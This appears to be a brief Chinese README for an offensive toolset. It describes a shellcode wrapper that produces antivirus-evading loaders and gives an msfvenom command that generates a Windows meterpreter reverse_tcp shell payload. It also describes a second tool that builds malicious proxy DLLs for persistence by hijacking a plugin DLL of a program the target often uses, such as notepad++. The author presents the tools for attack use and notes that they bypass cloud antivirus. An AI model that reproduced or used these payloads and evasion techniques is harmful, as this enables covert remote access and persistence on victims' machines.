一个小小的工具集
目前已经查杀,后续再更新
curl -o docker-compose.yml https://raw.githubusercontent.com/akkuman/toolset/master/docker-compose.yml
sudo docker-compose pull && sudo docker-compose up -d
访问 http://127.0.0.1:8080/swagger/index.html
即可查看接口文档
一个shellcode包装器,可根据提供的shellcode raw[msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f raw > ~/shell.raw
]文件
生成免杀的执行器
一天过去了,还能冲,应该bypass了云查杀
依旧是一个shellcode包装器,但是关注点不同,此工具根据用户所提供的dll和shellcode,生成一个恶意转发dll
一般可用在一些维权和白利用的场景上,比如目标用户使用 notepad++ 频率较高,则我们可以把 notepad++ 里面的某个插件的dll取出来做成恶意dll放入